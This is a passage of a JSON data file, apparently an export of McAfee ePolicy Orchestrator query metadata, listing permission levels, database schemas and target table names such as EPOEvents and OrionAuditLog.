ublic\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\
t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\
r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\",\\r\\n\\t\\t\\t\\\"Public\\\"\\r\\n\\t\\t]\"",
    "databaseType": "\"[\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\
t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\
",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\
"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\"\\r\\n\\t\\t]\"",
    "target": "\"[\\r\\n\\t\\t\\t\\\"EntitlementView\\\",\\r\\n\\t\\t\\t\\\"EntitlementView\\\",\\r\\n\\t\\t\\t\\\"EntitlementView\\\",\\r\\n\\t\\t\\t\\\"OrionAuditLog\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOLeafNode\\\",\\r\\n\\t\\t\\t\\\"EPOLeafNode\\\",\\r\\n\\t\\t\\t\\\"EPOLeafNode\\\",\\r\\n\\t\\t\\t\\\"EpoComplianceHistory\\\",\\r\\n\\t\\t\\t\\\"EpoRollup_Computers\\\",\\r\\n\\t\\t\\t\\\"EpoRollup_ComplianceHistory\\\",\\r\\n\\t\\t\\t\\\"OrionAuditLog\\\",\\r\\n\\t\\t\\t\\\"OrionAuditLog\\\",\\r\\n\\t\\t\\t\\\"OrionAuditLog\\\",\\r\\n\\t\\t\\t\\\"OrionAuditLog\\\",\\r\\n\\t\\t\\t\\\"OrionAuditLog\\\",\\r\\n\\t\\t\\t\\\"OrionAuditLog\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOAssignedPolicy\\\",\\r\\n\\t\\t\\t\\\"EPOAssignedPolicy\\\",\\r\\n\\t\\t\\t\\\"OrionAuditLog\\\",\\r\\n\\t\\t\\t\\\"EPOLeafNode\\\",\\r\\n\\t\\t\\t\\\"EPOLeafNode\\\",\\r\\n\\t\\t\\t\\\"EPOLeafNode\\\",\\r\\n\\t\\t\\t\\\"EPOLeafNode\\\",\\r\\n\\t\\t\\t\\\"EPOLeafNode\\\",\\r\\n\\t\\t\\t\\\"OrionTaskLogTask\\\",\\r\\n\\t\\t\\t\\\"EPOBrokenInherintanceView\\\",\\r\\n\\t\\t\\t\\\"EPOTaskAppliedTasks\\\",\\r\\n\\t\\t\\t\\\"EPOTaskBrokenInheritAssignments\\\",\\r\\n\\t\\t\\t\\\"EPOProductEvents\\\",\\r\\n\\t\\t\\t\\\"EPOProductEvents\\\",\\r\\n\\t\\t\\t\\\"EPOProductEvents\\\",\\r\\n\\t\\t\\t\\\"EPOProductEvents\\\",\\r\\n\\t\\t\\t\\\"EPOProductEvents\\\",\\r\\n\\t\\t\\t\\\"EPORepositoryStatus\\\",\\r\\n\\t\\t\\t\\\"OrionAuditLog\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOProductEvents\\\",\\r\\n\\t\\t\\t\\\"EPOLeafNode\\\",\\r\\n\\t\\t\\t\\\"EPOLeafNode\\\",\\r\\n\\t\\t\\t\\\"EPOAgentHandlers\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOProductEvents\\\",\\r\\n\\t\\t\\t\\\"EPOProductEvents\\\",\\r\\n\\t\\t\\t\\\"EPOProductEvents\\\",\\r\\n\\t\\t\\t\\\"EPOProductEvents\\\",\\r\\n\\t\\t\\t\\\"WP_CustomProps\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"W
P_CustomProps\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"WP_EventInfo\\\",\\r\\n\\t\\t\\t\\\"JTIClientEventInfoView\\\",\\r\\n\\t\\t\\t\\\"JTIClientEventInfoView\\\",\\r\\n\\t\\t\\t\\\"JTIClientEventInfoView\\\",\\r\\n\\t\\t\\t\\\"JTIClientEventInfoView\\\",\\r\\n\\t\\t\\t\\\"JTIClientEventInfoView\\\",\\r\\n\\t\\t\\t\\\"JTIClientEventInfoView\\\",\\r\\n\\t\\t\\t\\\"JTIClientEventInfoView\\\",\\r\\n\\t\\t\\t\\\"JTIClientEventInfoView\\\",\\r\\n\\t\\t\\t\\\"JTIClientEventInfoView\\\",\\r\\n\\t\\t\\t\\\"OrionAuditLog\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema.UDLP_IncidentsQueriesView\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema.UDLP_IncidentsQueriesView\\\",\\r\\n\\t\\t\\t\\\"EndpointInstallationStatus_View\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPExtendedEvent\\\",\\r\\n\\t\\t\\t\\\"EPExtendedEvent\\\",\\r\\n\\t\\t\\t\\\"EPExtendedEvent\\\",\\r\\n\\t\\t\\t\\\"EPExtendedEvent\\\",\\r\\n\\t\\t\\t\\\"EPExtendedEvent\\\",\\r\\n\\t\\t\\t\\\"AM_EndpointTechnologyStatus_View\\\",\\r\\n\\t\\t\\t\\\"GS_CustomProps\\\",\\r\\n\\t\\t\\t\\\"EPOAssignedPolicy\\\",\\r\\n\\t\\t\\t\\\"EPOAssignedPolicy\\\",\\r\\n\\t\\t\\t\\\"GS_CustomProps\\\",\\r\\n\\t\\t\
\t\\\"EPExtendedEvent\\\",\\r\\n\\t\\t\\t\\\"AM_CustomProps\\\",\\r\\n\\t\\t\\t\\\"AM_CustomProps\\\",\\r\\n\\t\\t\\t\\\"AM_CustomProps\\\",\\r\\n\\t\\t\\t\\\"AM_CustomProps\\\",\\r\\n\\t\\t\\t\\\"AM_CustomProps\\\",\\r\\n\\t\\t\\t\\\"AM_CustomProps\\\",\\r\\n\\t\\t\\t\\\"AM_CustomProps\\\",\\r\\n\\t\\t\\t\\\"AM_CustomProps\\\",\\r\\n\\t\\t\\t\\\"AM_CustomProps\\\",\\r\\n\\t\\t\\t\\\"AM_CustomProps\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"AM_CustomProps\\\",\\r\\n\\t\\t\\t\\\"AM_CustomProps\\\",\\r\\n\\t\\t\\t\\\"AM_CustomProps\\\",\\r\\n\\t\\t\\t\\\"AM_CustomProps\\\",\\r\\n\\t\\t\\t\\\"AM_CustomProps\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema.UDLP_ProductDistributionAllView\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema.UDLP_UserEmailStorageDiscoveryView\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema.UDLP_ComputerPropertiesView\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema.UDLP_ComputersToPoliciesView\\\",\\r\\n\\t\\t\\t\\\"udlpQuerySchema.UDLP_UserPropertiesView\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"EPExtendedEvent\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"FW_CustomProps\\\",\\r\\n\\t\\t\\t\\\"FW_CustomProps\\\",\\r\\n\\t\\t\\t\\\"FW_Rule\\\",\\r\\n\\t\\t\\t\\\"FW_Rule\\\",\\r\\n\\t\\t\\t\\\"FW_Rule\\\",\\r\\n\\t\\t\\t\\\"FW_Rule\\\",\\r\\n\\t\\t\\t\\\"FW_Rule\\\",\\r\\n\\t\\t\\t\\\"FW_CustomProps\\\",\\r\\n\\t\\t\\t\\\"FW_CustomProps\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.cleanup_trending_summary\\\",\\r\\n\\t\\t\\t\\\"TieServerSchema.cleanup_trending_summ